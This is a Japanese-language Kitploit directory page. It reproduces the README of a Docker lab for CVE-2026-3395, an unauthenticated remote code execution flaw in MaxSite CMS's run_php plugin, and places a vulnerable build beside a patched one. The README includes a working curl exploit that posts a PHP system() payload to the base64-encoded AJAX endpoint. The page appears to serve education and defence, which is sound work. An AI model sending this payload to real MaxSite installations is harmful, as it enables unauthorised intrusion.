Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-3395-Lab — 教育用Dockerラボ。MaxSite CMSのrun_phpプラグインを介した未認証RCEであるCVE-2026-3395を実演し、安全な再現と分析のための脆弱性環境とパッチ適用済み環境を備えています。 | Kitploit
ツール/GitHubGitHub/rootdirective-sec/cve-2026-3395-lab
脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ラボと実践
GitHubrootdirective-sec/cve-2026-3395-lab

CVE-2026-3395-Lab

教育用Dockerラボ。MaxSite CMSのrun_phpプラグインを介した未認証RCEであるCVE-2026-3395を実演し、安全な再現と分析のための脆弱性環境とパッチ適用済み環境を備えています。

リポジトリを見る
1237ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-3395 — MaxSite CMS 未認証RCEラボ

このリポジトリは教育および研究目的のみで使用してください。 すべてのテストはローカルのDockerラボ環境で行う必要があります。 このセットアップを公開システムや本番システムにデプロイしないでください。


概要

CVE-2026-3395はMaxSite CMSに影響し、管理用AJAXエンドポイントへの未認証アクセスを許可します。run_phpプラグインが有効な場合、CMSのフックシステムを通じてユーザー入力をPHPコードとして評価でき、リモートコード実行(RCE)につながる可能性があります。

このリポジトリには以下が含まれます:

  • 脆弱なビルド(パッチ適用前のコミット)
  • パッチ適用済みビルド(修正後のコミット)
  • 再現用のDockerラボ
  • 安全な影響実証デモ

脆弱性の概要

脆弱なエンドポイントは以下の場所にあります:

application/maxsite/admin/plugins/editor_markitup/preview-ajax.php

脆弱なバージョンでは:

  • エンドポイントは認証なしでアクセス可能
  • ユーザー入力(POSTデータ)はmso_hook()を介して渡される
  • run_phpプラグインが[php]...[/php]ブロックを処理
  • プラグインは囲まれたコードをeval()を使用して評価

run_phpが有効な場合、これは未認証のリモートコード実行につながります。

パッチ適用済みバージョンでは以下が追加されます:

if (!is_login()) die('no login');
mso_checkreferer();

これにより、認証済みユーザーのみにアクセスが制限されます。


Dockerラボのセットアップ

このラボは2つの環境を構築します:

環境ポート
脆弱8081
パッチ適用済み8082

要件

  • Docker
  • Docker Compose v2

1. ビルドと起動

docker compose up -d --build

これにより:

  • 両方のイメージをビルド
  • データベースを起動
  • CMSインストーラーを自動実行
  • ラボ設定でrun_phpを有効化

2. インストールの確認

ブラウザで以下を開きます:

http://localhost:8081  (脆弱)
http://localhost:8082  (パッチ適用済み)

両方のインスタンスが正常に読み込まれるはずです。

ラボ実行中


脆弱性の実証(ラボのみ)

AJAXルートはbase64エンコードされたパスを使用します。

以下をbase64エンコードしたもの:

admin/plugins/editor_markitup/preview-ajax.php

は次のとおりです:

YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA==

脆弱なインスタンスのテスト

curl -X POST "http://localhost:8081/ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA==" \
  -H "X-Requested-With: XMLHttpRequest" \
  -H "Referer: http://localhost:8081/" \
  --data-urlencode "data=[php]system('id');[/php]"

脆弱なRCE出力


パッチ適用済みインスタンスのテスト

curl -X POST "http://localhost:8082/ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA==" \
  -H "X-Requested-With: XMLHttpRequest" \
  -H "Referer: http://localhost:8082/" \
  --data-urlencode "data=[php]system('id');[/php]"

期待される結果:

no login

パッチ適用済みのアクセス制御


ラボの停止

コンテナを停止するには:

docker compose down -v

免責事項

このプロジェクトは、研究および学習目的のために隔離された環境でのみ使用してください。


参考情報

  • 公開ライトアップ: https://github.com/mbanyamer/CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE/
  • VulDBエントリ: https://vuldb.com/?submit.762169
  • 公式パッチコミット: https://github.com/maxsite/cms/commit/08937a3c5d672a242d68f53e9fccf8a748820ef3
ツールをダウンロード